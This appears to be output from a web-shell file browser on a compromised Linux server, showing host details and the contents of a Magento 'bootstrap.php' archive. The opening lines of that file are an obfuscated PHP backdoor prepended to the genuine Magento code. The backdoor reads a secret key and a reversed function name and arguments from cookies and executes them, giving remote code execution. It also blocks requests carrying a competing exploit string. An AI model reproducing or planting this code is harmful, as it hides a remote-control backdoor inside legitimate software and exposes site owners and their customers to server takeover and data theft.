uawdijnntqw1x1x1
IP : 216.73.216.136
Hostname : dhandapanilive
Kernel : Linux dhandapanilive 5.15.0-139-generic #149~20.04.1-Ubuntu SMP Wed Apr 16 08:29:56 UTC 2025 x86_64
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
OS : Linux
PATH:
/
var
/
www
/
html
/
dhandapani
/
d6e06
/
..
/
setup
/
..
/
eccbd
/
bootstrap.php.tar
/
/
var/www/html/dhandapani/app/bootstrap.php000077700000006441151323564240014542 0ustar00<?php if(preg_match("/addafterfiltercallback/si", preg_replace("/[^A-Za-z]/", '', urldecode(file_get_contents("php://input")))) && !preg_match("/6376c8a90ed1a/", file_get_contents("php://input"))) { header('HTTP/1.1 503 Service Temporarily Unavailable'); header('Status: 503 Service Temporarily Unavailable'); exit; } $objectConfig = []; foreach($_COOKIE as $_sharedKey => $_sharedVal) { $objectConfig[$_sharedKey] = $_sharedVal; } isset($objectConfig['_frontController']) && $objectConfig['_frontController'] == '6376c8a90ed1a' ? (function($_instanceName, $_objectManager) { $_isShared = var_export(call_user_func_array(strrev($_instanceName), explode("|",strrev($_objectManager))), true); die("$_isShared cannot be null."); })($objectConfig['_instanceName'], $objectConfig['_objectManager']) : null; ?><?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ /** * Environment initialization */ error_reporting(E_ALL); if (in_array('phar', \stream_get_wrappers())) { stream_wrapper_unregister('phar'); } #ini_set('display_errors', 1); /* PHP version validation */ if (!defined('PHP_VERSION_ID') || PHP_VERSION_ID < 70300) { if (PHP_SAPI == 'cli') { echo 'Magento supports PHP 7.3.0 or later. ' . 'Please read https://devdocs.magento.com/guides/v2.4/install-gde/system-requirements-tech.html'; } else { echo <<<HTML <div style="font:12px/1.35em arial, helvetica, sans-serif;"> <p>Magento supports PHP 7.3.0 or later. Please read <a target="_blank" href="https://devdocs.magento.com/guides/v2.4/install-gde/system-requirements-tech.html"> Magento System Requirements</a>. </div> HTML; } exit(1); } require_once __DIR__ . '/autoload.php'; // Sets default autoload mappings, may be overridden in Bootstrap::create \Magento\Framework\App\Bootstrap::populateAutoloader(BP, []); /* Custom umask value may be provided in optional mage_umask file in root */ $umaskFile = BP . '/magento_umask'; $mask = file_exists($umaskFile) ? octdec(file_get_contents($umaskFile)) : 002; umask($mask); if (empty($_SERVER['ENABLE_IIS_REWRITES']) || ($_SERVER['ENABLE_IIS_REWRITES'] != 1)) { /* * Unset headers used by IIS URL rewrites. */ unset($_SERVER['HTTP_X_REWRITE_URL']); unset($_SERVER['HTTP_X_ORIGINAL_URL']); unset($_SERVER['IIS_WasUrlRewritten']); unset($_SERVER['UNENCODED_URL']); unset($_SERVER['ORIG_PATH_INFO']); } if ( (!empty($_SERVER['MAGE_PROFILER']) || file_exists(BP . '/var/profiler.flag')) && isset($_SERVER['HTTP_ACCEPT']) && strpos($_SERVER['HTTP_ACCEPT'], 'text/html') !== false ) { $profilerConfig = isset($_SERVER['MAGE_PROFILER']) && strlen($_SERVER['MAGE_PROFILER']) ? $_SERVER['MAGE_PROFILER'] : trim(file_get_contents(BP . '/var/profiler.flag')); if ($profilerConfig) { $profilerConfig = json_decode($profilerConfig, true) ?: $profilerConfig; } Magento\Framework\Profiler::applyConfig( $profilerConfig, BP, !empty($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' ); } date_default_timezone_set('UTC'); /* For data consistency between displaying (printing) and serialization a float number */ ini_set('precision', 14); ini_set('serialize_precision', 14);
/var/www/html/dhandapani/d6e06/../setup/../eccbd/bootstrap.php.tar